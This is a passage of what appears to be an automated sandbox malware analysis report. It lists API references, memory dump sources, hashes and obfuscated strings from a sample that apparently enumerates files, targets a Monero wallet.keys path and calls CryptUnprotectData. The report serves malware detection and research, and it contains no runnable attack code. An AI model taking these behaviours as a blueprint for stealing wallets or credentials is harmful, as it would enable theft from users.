                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: f665afd0e21e2cb5caef8575005c059a6fe7cb7f6ee9fc486a86065749cbb8a2
                                • Instruction ID: bccc114735bc7f1e161989dec7c595c6814c4e661c1fe5ba3e8458cb1d56331b
                                • Opcode Fuzzy Hash: f665afd0e21e2cb5caef8575005c059a6fe7cb7f6ee9fc486a86065749cbb8a2
                                • Instruction Fuzzy Hash: 40412E71940228ABDB24DF54EC99BEEB7B4FF48700F204199E50A76281DB742F85CFA1
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E30D73), ref: 00E1E4A2
                                • StrCmpCA.SHLWAPI(?,00E314F8), ref: 00E1E4F2
                                • StrCmpCA.SHLWAPI(?,00E314FC), ref: 00E1E508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1EBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: e73e25329df65229efbd1f45b8b2203ad53131c6f514940ad4036dadae5bfe9b
                                • Instruction ID: b0e82eed31aee7e7680a4abe964f98d3b56dd14bc47710aeb22c3be096e78353
                                • Opcode Fuzzy Hash: e73e25329df65229efbd1f45b8b2203ad53131c6f514940ad4036dadae5bfe9b
                                • Instruction Fuzzy Hash: A71244729101249BDB1CFB60EC9AEED73B9AF94300F4455B9F50A72081EE745F89CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "j?$*_:$l_%[$pW}$Jf:$]O?
                                • API String ID: 0-1442580323
                                • Opcode ID: 3a2ca93748d25c859b37276daeaf831aece83628a36dcc6ea9594e1eee836a74
                                • Instruction ID: 5df29a32fb7621c60cc5a781d940911e2046aa697ff19ed4db771a523c5a6023
                                • Opcode Fuzzy Hash: 3a2ca93748d25c859b37276daeaf831aece83628a36dcc6ea9594e1eee836a74
                                • Instruction Fuzzy Hash: 43B248F360C2049FE3086E2DEC8567AFBE9EF94320F1A453DEAC5C3744EA3558058696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: O_Z$Ryug$Ryug$cIwy$jHj~$xu
                                • API String ID: 0-1463951730
                                • Opcode ID: b15bce1063b4359fdee5453c75fb5fa91816f6ce0c197a0d8298c3c9a342aa75
                                • Instruction ID: 7e52ab14d943e988b636a9bf31ec7f71387dbaf2f0b51c3f124ba36072ecbd63
                                • Opcode Fuzzy Hash: b15bce1063b4359fdee5453c75fb5fa91816f6ce0c197a0d8298c3c9a342aa75
                                • Instruction Fuzzy Hash: 31B207F3A0C2049FE304AE2DEC8567ABBE5EF94720F16853DE6C4C7744EA3598058796
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E19AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00E14EEE,00000000,?), ref: 00E19B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E19B2A
                                • LocalFree.KERNEL32(?,?,?,?,00E14EEE,00000000,?), ref: 00E19B3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID: N
                                • API String ID: 4291131564-1689755984
                                • Opcode ID: b5b86d994aa39b69406a612238308a80e1d2a5e87477b0728e4c2359ddaad57d
                                • Instruction ID: dd92deb803cbe342aaab0d2b65ebaca6d83ac45dab9d149d792b2a7aa048e14f
                                • Opcode Fuzzy Hash: b5b86d994aa39b69406a612238308a80e1d2a5e87477b0728e4c2359ddaad57d
                                • Instruction Fuzzy Hash: C811A2B4240308EFEB10CF64D895FAA77B5FB89B04F208559FA159B384C7B6A941CB94
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: /|w$Gkoj$v8g$v8g$pzz
                                • API String ID: 0-1436474391
                                • Opcode ID: abe2b22a790955a32b6ac8659db3d7c304e58102f37302be69b9b265fa69722e
                                • Instruction ID: 7b27cc8ec14b4b237fe80a3fc9b0b553d64a3de977fd8ff466499757438212b3
                                • Opcode Fuzzy Hash: abe2b22a790955a32b6ac8659db3d7c304e58102f37302be69b9b265fa69722e
                                • Instruction Fuzzy Hash: 6FB20BF3A0C2109FE304AE29EC8567AB7E9EFD4720F1A853DE6C5C7744E63598018796
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *{oo$7P:?$YQwv$B>^$B>^
                                • API String ID: 0-941376645
                                • Opcode ID: 509d138357f551ef23c9f202818c722f39b0b385ed9306a08b923bb5c4514407
                                • Instruction ID: 3aca75b2f71f2321791caba94fb9f1d0936932b5585ed79aa705eb0a038e9c7c
                                • Opcode Fuzzy Hash: 509d138357f551ef23c9f202818c722f39b0b385ed9306a08b923bb5c4514407
                                • Instruction Fuzzy Hash: 6EB2F9F3608214AFE304AE2DEC8567AFBE9EF94720F16493DEAC5C3744E63558018697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: +`?>$:mg$\}W_$e1~W$l^C:
                                • API String ID: 0-1207566776
                                • Opcode ID: dd3f6aa3b4523c18cacdaeea847aa6cc45b3c233637272cd03a7ae89aa3bff1b
                                • Instruction ID: b8ad2653ae1d3b93fa3deb1eaefb7fc45217ae9aad8e8abe245ff2712dba6117
                                • Opcode Fuzzy Hash: dd3f6aa3b4523c18cacdaeea847aa6cc45b3c233637272cd03a7ae89aa3bff1b
                                • Instruction Fuzzy Hash: 66B2F6F3A0C2009FE304AE2DEC8577ABBE9EF94320F16493DE6C5C7744E63598458696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "H}m$ebc$ebc$~o>p$7'
                                • API String ID: 0-1202201637
                                • Opcode ID: 80ba30a4ea9a271afb11e26ba4bd3e88770e15433481262ce1f068b03cced8b6
                                • Instruction ID: 51e19a52173a33fc4229f3d8ed338b263d8806f5e527ae7309ebad9c2b612722
                                • Opcode Fuzzy Hash: 80ba30a4ea9a271afb11e26ba4bd3e88770e15433481262ce1f068b03cced8b6
                                • Instruction Fuzzy Hash: DBA215F350C2009FE304AE29EC8567AFBE9EF94720F16893DEAC5C7744EA3558058697
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E1C871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E1C87C
                                • lstrcat.KERNEL32(?,00E30B46), ref: 00E1C943
                                • lstrcat.KERNEL32(?,00E30B47), ref: 00E1C957
                                • lstrcat.KERNEL32(?,00E30B4E), ref: 00E1C978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: cf1907f4be6eae0bff3a15f5a12068198b86c257a43d4a7e46305e83052fc1c9
                                • Instruction ID: daac1467b140991a9cb0d0cd7e7f4ba1d961e79bed49083a3c34314a69a33d7a
                                • Opcode Fuzzy Hash: cf1907f4be6eae0bff3a15f5a12068198b86c257a43d4a7e46305e83052fc1c9
                                • Instruction Fuzzy Hash: 78416DB4A0431ADBDB10DF90DD89BFFB7B8AB88304F1042A8E509B7280D7755A84CF91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !Wo_$!Wo_$Auy{$Ci?$eJk
                                • API String ID: 0-3732368636
                                • Opcode ID: adb80f3a428c6016a2731070dc922afc74ff1966394e8f0d1f94a285381ad60b
                                • Instruction ID: 10dce0058d218d0e3fcca9b90a792f7629637de2fa2880180f4f1cb5414b33fc
                                • Opcode Fuzzy Hash: adb80f3a428c6016a2731070dc922afc74ff1966394e8f0d1f94a285381ad60b
                                • Instruction Fuzzy Hash: A49228F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A453DEAC4C3744E63558158697
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E1724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E17254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E17281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E172A4
                                • LocalFree.KERNEL32(?), ref: 00E172AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: c76a8c59ddf82d3e32218f5c11a416dca6fabe65b6c285fac9de259f13d7c803
                                • Instruction ID: 1f507e54bb8eb10b0e26aadc89155e5b318816fd1d3b2a2f007bacdb9c5fda64
                                • Opcode Fuzzy Hash: c76a8c59ddf82d3e32218f5c11a416dca6fabe65b6c285fac9de259f13d7c803
                                • Instruction Fuzzy Hash: 0301E9B5B40308BBEB20DB94CD4AFAE77B8AB44B04F104154FB45BB2C4D6B5AA018B65
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E2961E
                                • Process32First.KERNEL32(00E30ACA,00000128), ref: 00E29632
                                • Process32Next.KERNEL32(00E30ACA,00000128), ref: 00E29647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00E2965C
                                • CloseHandle.KERNEL32(00E30ACA), ref: 00E2967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                 • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
